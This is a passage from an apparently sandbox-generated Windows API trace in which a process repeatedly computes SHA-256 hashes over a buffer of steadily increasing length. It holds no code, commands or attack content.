	[0229.857] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.857] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d260
	[0229.857] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d260, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d260, pdwDataLen=0x128ba4) returned 1
	[0229.857] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.857] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.857] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.857] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.857] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0229.857] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.857] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d288
	[0229.857] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d288, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d288, pdwDataLen=0x128ba4) returned 1
	[0229.857] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.858] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.858] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.858] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.858] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0229.858] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.858] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d2b0
	[0229.858] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d2b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d2b0, pdwDataLen=0x128ba4) returned 1
	[0229.858] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.858] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.858] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.859] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.859] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0229.859] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d2d8
	[0229.859] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d2d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d2d8, pdwDataLen=0x128ba4) returned 1
	[0229.859] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.859] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.859] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.859] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.859] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0229.859] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.859] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d300
	[0229.859] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d300, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d300, pdwDataLen=0x128ba4) returned 1
	[0229.859] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.859] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.859] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.860] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.860] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0229.860] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.860] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d328
	[0229.860] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d328, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d328, pdwDataLen=0x128ba4) returned 1
	[0229.860] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.860] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.860] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.861] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.861] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0229.861] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d350
	[0229.861] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d350, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d350, pdwDataLen=0x128ba4) returned 1
	[0229.861] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.861] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.861] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.861] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.861] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0229.861] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d378
	[0229.862] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d378, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d378, pdwDataLen=0x128ba4) returned 1
	[0229.862] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.862] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.862] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.862] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.862] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0229.862] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.862] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d3a0
	[0229.862] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d3a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d3a0, pdwDataLen=0x128ba4) returned 1
	[0229.862] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.862] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.862] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.862] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.862] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0229.863] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d3c8
	[0229.863] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d3c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d3c8, pdwDataLen=0x128ba4) returned 1
	[0229.863] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.863] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.863] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.863] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.863] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0229.863] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.863] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d3f0
	[0229.863] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d3f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d3f0, pdwDataLen=0x128ba4) returned 1
	[0229.863] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.863] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.863] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.864] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.864] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0229.864] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d418
	[0229.864] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d418, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d418, pdwDataLen=0x128ba4) returned 1
	[0229.864] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.864] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.864] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.864] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.864] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0229.864] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.864] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d440
	[0229.864] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d440, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d440, pdwDataLen=0x128ba4) returned 1
	[0229.865] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.865] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.865] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.865] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.865] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0229.865] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.865] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d468
	[0229.865] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d468, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d468, pdwDataLen=0x128ba4) returned 1
	[0229.865] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.865] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.865] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.866] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.866] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0229.866] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d490
	[0229.866] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d490, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d490, pdwDataLen=0x128ba4) returned 1
	[0229.866] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.866] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.866] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.866] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.866] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0229.866] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.866] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d4b8
	[0229.866] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d4b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d4b8, pdwDataLen=0x128ba4) returned 1
	[0229.866] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.866] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.866] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.867] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.867] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0229.867] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d4e0
	[0229.867] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d4e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d4e0, pdwDataLen=0x128ba4) returned 1
	[0229.867] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.867] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.867] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.867] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.867] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0229.867] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d508
	[0229.867] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d508, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d508, pdwDataLen=0x128ba4) returned 1
	[0229.867] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.867] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.867] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.868] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.868] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0229.868] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d530
	[0229.868] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d530, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d530, pdwDataLen=0x128ba4) returned 1
	[0229.868] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.868] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.868] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.868] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.868] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0229.868] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.868] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d558
	[0229.868] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d558, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d558, pdwDataLen=0x128ba4) returned 1
	[0229.869] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.869] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.869] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.869] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.869] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0229.869] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.869] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d580
	[0229.869] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d580, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d580, pdwDataLen=0x128ba4) returned 1
	[0229.869] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.869] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.869] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.869] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.869] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0229.869] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d5a8
	[0229.870] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d5a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d5a8, pdwDataLen=0x128ba4) returned 1
	[0229.870] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.870] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.870] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.870] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.870] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0229.870] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.870] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d5d0
	[0229.870] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d5d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d5d0, pdwDataLen=0x128ba4) returned 1
	[0229.870] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.870] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.870] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.870] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.870] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0229.871] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d5f8
	[0229.871] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231d5f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d5f8, pdwDataLen=0x128ba4) returned 1
	[0229.871] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.871] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.871] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.871] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.871] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0229.871] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.871] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231d620
	[0229.871] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231d620, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231d620, pdwDataLen=0x128ba4) returned 1
	[0229.871] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.871] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.871] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.871] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.872] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0xd20, dwFlags=0x0) returned 1
